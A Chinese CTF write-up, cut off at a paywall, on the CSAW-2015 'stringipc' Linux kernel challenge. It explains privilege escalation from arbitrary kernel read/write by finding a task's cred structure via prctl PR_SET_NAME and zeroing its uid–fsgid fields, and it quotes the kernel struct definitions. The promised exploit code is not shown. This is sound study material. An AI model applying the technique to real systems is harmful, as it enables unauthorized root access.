本文探讨了如何在Linux内核中利用内存任意读写漏洞修改cred结构体来提升权限。首先介绍了cred结构体在thread_info和task_struct中的位置,然后阐述了利用prctl的PR_SET_NAME功能寻找cred的思路,并确定了爆破内存范围。最后,文章提供了利用方法和EXP代码。
题目:CSAW-2015-CTF的stringipc
环境下载:https://github.com/bsauce/CTF/tree/master/stringipc
目的:学习三种从内存任意读写到权限提升的利用方法。
环境搭建:
内核版本—linux-4.4.184 (gcc-4.7不行,得用gcc-5) busybox版本—1.31.0 stringipc源码[1] 源码及busybox编译[2]
题目分析:已经在上一篇文章中分析过,见sold_core分析[3]。
1. 修改cred结构提升权限
(1)cred结构体
每个线程在内核中都对应一个线程栈、一个线程结构块thread_info去调度,结构体同时也包含了线程的一系列信息。
thread_info结构体存放位于线程栈的最低地址,对应的结构体定义(\arch\x86\include\asm\thread_info.h 55):
struct thread_info {
struct task_struct *task; /* main task structure */ __u32 flags; /* low level flags */ __u32 status; /* thread synchronous flags */ __u32 cpu; /* current CPU */ mm_segment_t addr_limit; unsigned int sig_on_uaccess_error:1; unsigned int uaccess_err:1; /* uaccess failed */};thread_info中最重要的信息是task_struct结构体,定义在(\include\linux\sched.h 1390)。
//裁剪过后 struct task_struct {
volatile long state; /* -1 unrunnable, 0 runnable, >0 stopped */ void *stack; atomic_t usage; unsigned int flags; /* per process flags, defined below */ unsigned int ptrace;... .../* process credentials */ const struct cred __rcu *ptracer_cred; /* Tracer's credentials at attach */ const struct cred __rcu *real_cred; /* objective and real subjective task * credentials (COW) */ const struct cred __rcu *cred; /* effective (overridable) subjective task * credentials (COW) */ char comm[TASK_COMM_LEN]; /* executable name excluding path - access with [gs]et_task_comm (which lock it with task_lock()) - initialized normally by setup_new_exec *//* file system info */ struct nameidata *nameidata;#ifdef CONFIG_SYSVIPC/* ipc stuff */ struct sysv_sem sysvsem; struct sysv_shm sysvshm;#endif... ... };其中,cred结构体(\include\linux\cred.h 118)就表示该线程的权限。只要将结构体的uid~fsgid全部覆写为0即可提权该线程(root uid为0)。前28字节!!!!
struct cred {
atomic_t usage;#ifdef CONFIG_DEBUG_CREDENTIALS atomic_t subscribers; /* number of processes subscribed */ void *put_addr; unsigned magic;#define CRED_MAGIC 0x43736564#define CRED_MAGIC_DEAD 0x44656144#endif kuid_t uid; /* real UID of the task */ kgid_t gid; /* real GID of the task */ kuid_t suid; /* saved UID of the task */ kgid_t sgid; /* saved GID of the task */ kuid_t euid; /* effective UID of the task */ kgid_t egid; /* effective GID of the task */ kuid_t fsuid; /* UID for VFS ops */ kgid_t fsgid; /* GID for VFS ops */ unsigned securebits; /* SUID-less security management */ kernel_cap_t cap_inheritable; /* caps our children can inherit */ kernel_cap_t cap_permitted; /* caps we're permitted */ kernel_cap_t cap_effective; /* caps we can actually use */ kernel_cap_t cap_bset; /* capability bounding set */ kernel_cap_t cap_ambient; /* Ambient capability set */#ifdef CONFIG_KEYS unsigned char jit_keyring; /* default keyring to attach requested * keys to */ struct key __rcu *session_keyring; /* keyring inherited over fork */ struct key *process_keyring; /* keyring private to this process */ struct key *thread_keyring; /* keyring private
最低0.47元/天 解锁文章
112
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
